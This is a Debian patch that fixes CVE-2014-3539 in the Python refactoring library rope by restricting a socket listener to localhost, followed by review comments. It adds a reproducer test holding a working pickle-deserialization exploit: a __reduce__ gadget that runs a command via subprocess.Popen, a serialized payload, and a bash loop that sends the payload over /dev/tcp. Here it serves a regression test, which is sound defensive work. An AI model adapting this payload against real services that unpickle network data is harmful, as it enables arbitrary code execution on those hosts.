Package: rope / 0.10.3-1

From 7f19bb6d79d2426f4b29e531f12116398efce357 Mon Sep 17 00:00:00 2001
From: Arnaud Fontaine <arnau@debian.org>
Date: Thu, 26 Jan 2017 13:38:11 +0900
Subject: =?UTF-8?q?Mitigations=20for=20CVE-2014-3539=20from=20the=20upstre?=
 =?UTF-8?q?am=20author=20personal=20repository=0A(https://github.com/mcepl?=
 =?UTF-8?q?/rope):?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

  commit a2ea5f98d18ed037090afb048a48f87b515ff8dc
  Author: Matěj Cepl <mcepl@cepl.eu>
  Date:   Tue Feb 10 12:34:20 2015 +0100

      Just add reporter’s suggested reproducer

  commit a6cb534debe9aff623b6b19ae2dedbf872069a50
  Author: Matej Cepl <mcepl@cepl.eu>
  Date:   Thu Feb 12 01:12:15 2015 +0100

      limit socket connections to localhost

Patch-Name: CVE-2014-3539.patch
---
 rope/base/oi/doa.py                      |  2 +-
 ropetest/CVE20143539/CVE-2014-3539.py    | 18 ++++++++++++++++++
 ropetest/CVE20143539/README.md           | 17 +++++++++++++++++
 ropetest/CVE20143539/__init__.py         | 32 ++++++++++++++++++++++++++++++++
 ropetest/CVE20143539/generate_payload.py |  8 ++++++++
 ropetest/CVE20143539/payload.txt         |  9 +++++++++
 ropetest/CVE20143539/project/hello.py    |  1 +
 ropetest/CVE20143539/run_reproducer.sh   | 11 +++++++++++
 ropetest/__init__.py                     |  3 +++
 9 files changed, 100 insertions(+), 1 deletion(-)
 create mode 100644 ropetest/CVE20143539/CVE-2014-3539.py
 create mode 100644 ropetest/CVE20143539/README.md
 create mode 100644 ropetest/CVE20143539/__init__.py
 create mode 100644 ropetest/CVE20143539/generate_payload.py
 create mode 100644 ropetest/CVE20143539/payload.txt
 create mode 100644 ropetest/CVE20143539/project/hello.py
 create mode 100644 ropetest/CVE20143539/run_reproducer.sh

diff --git a/rope/base/oi/doa.py b/rope/base/oi/doa.py
index de45902..ed44d25 100644
--- a/rope/base/oi/doa.py
+++ b/rope/base/oi/doa.py
@@ -116,7 +116,7 @@ class _SocketReceiver(_MessageReceiver):
         self.data_port = 3037
         while self.data_port < 4000:
             try:
-                self.server_socket.bind(('', self.data_port))
+                self.server_socket.bind(('127.0.0.1', self.data_port))
                 break
             except socket.error:
                 self.data_port += 1
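Review bot: Binding to `'127.0.0.1'` on the `+` line keeps remote hosts away from the listener, but any process on the same machine can still connect to whichever port in 3037–3999 was chosen, and, going by the CVE named in the commit subject (the receive path is outside this hunk), what arrives there is still unpickled, so this narrows exposure rather than closing it; the reproducer shipped in the same patch connects to the local port and would presumably still succeed. A stronger fix would authenticate the peer — a per-run random token the client must send first, or a UNIX-domain socket protected by filesystem permissions — or replace pickle with a data-only format such as JSON for the messages exchanged. At minimum the line deserves a comment recording the residual risk, e.g. `# loopback only: any local user can still connect, and the data is unpickled -- TODO(review) authenticate the peer or drop pickle`. The enclosing method starts before this hunk.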
diff --git a/ropetest/CVE20143539/CVE-2014-3539.py b/ropetest/CVE20143539/CVE-2014-3539.py
new file mode 100644
index 0000000..5dd37e1
--- /dev/null
+++ b/ropetest/CVE20143539/CVE-2014-3539.py
@@ -0,0 +1,18 @@
+#!/usr/bin/env python
+# CVE-2014-3539 reproducer/exploit
+# Vasyl Kaigorodov <vkaigoro@redhat.com>
+# Tested on Python 2.7.x
+
+import sys
+from rope.base import project
+
+try:
+    open('payload.txt', 'r')
+except IOError:
+    print("payload.txt not found, run:")
+    print("\tpython generate_payload.py")
+    sys.exit(1)
+
+myproject = project.Project('project/')
+res = myproject.get_resource("hello.py")
+myproject.pycore.run_module(res)
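Review bot: `open('payload.txt', 'r')` under `try:` is used only as an existence probe, so the returned file object is never closed and the handle lives until garbage collection. Replace the try/except with `if not os.path.isfile('payload.txt'):` followed by the two prints and `sys.exit(1)`, adding `import os` beside `import sys`. The relative paths `'payload.txt'` and `'project/'` depend on the working directory, which the calling unittest sets via `cwd=cur_dir`; a one-line comment such as `# paths are relative to this directory; the test runner sets cwd accordingly` makes that dependency explicit.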
diff --git a/ropetest/CVE20143539/README.md b/ropetest/CVE20143539/README.md
new file mode 100644
index 0000000..5c620ef
--- /dev/null
+++ b/ropetest/CVE20143539/README.md
@@ -0,0 +1,17 @@
+== List of files ==
+
+project/			- directory containing an example python module
+CVE-2014-3539.py	- python script which tries to load an example python module
+				      for re-factoring (normal workflow simulation)
+generate_payload.py - generates payload.txt (evil code to run)
+payload.txt			- example payload (running /bin/uptime)
+run_reproducer.sh	- main file that sticks above together
+
+== Usage ==
+
+Run ./run_reproducer.sh.
+If the system is vulnerable, you'll see the output similar to below:
+
+  $ ./run_reproducer.sh
+  SUCCESS:  15:13:46 up 21:26, 2 users,  load average: 0.02, 0.63, 1.01
+
diff --git a/ropetest/CVE20143539/__init__.py b/ropetest/CVE20143539/__init__.py
new file mode 100644
index 0000000..3ab3be6
--- /dev/null
+++ b/ropetest/CVE20143539/__init__.py
@@ -0,0 +1,32 @@
+import os.path
+import subprocess
+try:
+    import unittest2 as unittest
+except ImportError:
+    import unittest
+
+
+class TestCVE20143539(unittest.TestCase):
+    def test_case(self):
+        cur_dir = os.path.dirname(__file__)
+        script_name = os.path.join(cur_dir, 'run_reproducer.sh')
+        pid = subprocess.Popen([script_name], stdout=subprocess.PIPE,
+                               stderr=subprocess.PIPE, cwd=cur_dir)
+        pid.communicate()
+        self.assertEquals(pid.returncode, 0)
+
+
+def suite():
+    result = unittest.TestSuite()
+    result.addTests(unittest.makeSuite(TestCVE20143539))
+    return result
+
+
+if __name__ == '__main__':
+    import sys
+    if len(sys.argv) > 1:
+        unittest.main()
+    else:
+        runner = unittest.TextTestRunner()
+        res = runner.run(suite())
+        sys.exit(not res.wasSuccessful())
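Review bot: `test_case` asserts only `pid.returncode == 0`, which `run_reproducer.sh` returns whenever `CVE-2014-3539.py` exits cleanly, so the test passes whether or not the payload actually ran; the `SUCCESS:` marker the script prints on exploitation is discarded by the bare `pid.communicate()`. Capture it instead — `out, err = pid.communicate()`, then `self.assertEqual(pid.returncode, 0)` and `self.assertNotIn(b'SUCCESS', out)` — so the test fails if the listener still executes the payload (this also drops the deprecated `assertEquals` alias); if the loopback-only bind turns out not to stop a local connection, that assertion surfaces it instead of passing silently. The script further requires bash, `/dev/tcp`, `killall` and a `python` on PATH, so guarding the class with `@unittest.skipUnless(sys.platform.startswith('linux'), 'reproducer needs bash and /dev/tcp')`, with `import sys` moved to the top of the module, would keep the suite from failing spuriously elsewhere.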
diff --git a/ropetest/CVE20143539/generate_payload.py b/ropetest/CVE20143539/generate_payload.py
new file mode 100644
index 0000000..c8d3e01
--- /dev/null
+++ b/ropetest/CVE20143539/generate_payload.py
@@ -0,0 +1,8 @@
+import cPickle
+import subprocess
+
+class RunBinSh(object):
+  def __reduce__(self):
+    return (subprocess.Popen, (('/bin/uptime',),))
+
+open('payload.txt', 'w').write(cPickle.dumps(RunBinSh()))
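Review bot: `open('payload.txt', 'w').write(...)` on the last line never closes the file explicitly, so on interpreters without refcount-driven finalization the contents may not be flushed before the reproducer reads them; write it as `with open('payload.txt', 'wb') as f: f.write(cPickle.dumps(RunBinSh()))`. `cPickle` exists only on Python 2, which matches the `Tested on Python 2.7.x` header of the sibling script but is worth stating in a comment at the top of this file, and the two-space indentation differs from the four spaces used in the rest of the patch.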
diff --git a/ropetest/CVE20143539/payload.txt b/ropetest/CVE20143539/payload.txt
new file mode 100644
index 0000000..434dd0f
--- /dev/null
+++ b/ropetest/CVE20143539/payload.txt
@@ -0,0 +1,9 @@
+csubprocess
+Popen
+p1
+((S'/bin/uptime'
+p2
+tp3
+tp4
+Rp5
+.
\ No newline at end of file
diff --git a/ropetest/CVE20143539/project/hello.py b/ropetest/CVE20143539/project/hello.py
new file mode 100644
index 0000000..7df869a
--- /dev/null
+++ b/ropetest/CVE20143539/project/hello.py
@@ -0,0 +1 @@
+print("Hello, World!")
diff --git a/ropetest/CVE20143539/run_reproducer.sh b/ropetest/CVE20143539/run_reproducer.sh
new file mode 100644
index 0000000..b1f7fac
--- /dev/null
+++ b/ropetest/CVE20143539/run_reproducer.sh
@@ -0,0 +1,11 @@
+#!/bin/bash
+export PYTHONPATH=$(readlink -f ../..):$PYTHONPATH
+trap "killall -- $(basename $0)" EXIT
+
+(while : ; do
+    ( cat payload.txt > /dev/tcp/0.0.0.0/3037; ) &>/dev/null \
+        && echo -n "SUCCESS: "
+done)&
+
+python CVE-2014-3539.py 2>/dev/null
+exit $?
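Review bot: `trap "killall -- $(basename $0)" EXIT` on the third line kills every process named `run_reproducer.sh` on the host, not just the loop this invocation started, which is unsafe when two test runs overlap. Move the trap after the `)&` line and target the job it created: `trap 'kill "$!" 2>/dev/null' EXIT`. The loop also hard-codes port 3037 while `doa.py` falls back to 3038–3999 whenever 3037 is busy, in which case nothing reaches rope's listener yet the script still exits 0 — the script should report the missing `SUCCESS:` marker as a distinct outcome rather than folding it into the exit status of `python CVE-2014-3539.py`. Writing to `/dev/tcp/0.0.0.0/3037` relies on Linux routing `0.0.0.0` to loopback; `127.0.0.1` states the intent and matches the address the fix binds to.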
diff --git a/ropetest/__init__.py b/ropetest/__init__.py
index f1cb459..744beee 100644
--- a/ropetest/__init__.py
+++ b/ropetest/__init__.py
@@ -16,6 +16,8 @@ import ropetest.simplifytest
 import ropetest.contrib
 import ropetest.refactor
 
+import ropetest.CVE20143539
+
 
 def suite():
     result = unittest.TestSuite()
@@ -33,6 +35,7 @@ def suite():
 
     result.addTests(ropetest.refactor.suite())
     result.addTests(ropetest.contrib.suite())
+    result.addTests(ropetest.CVE20143539.suite())
 
     return result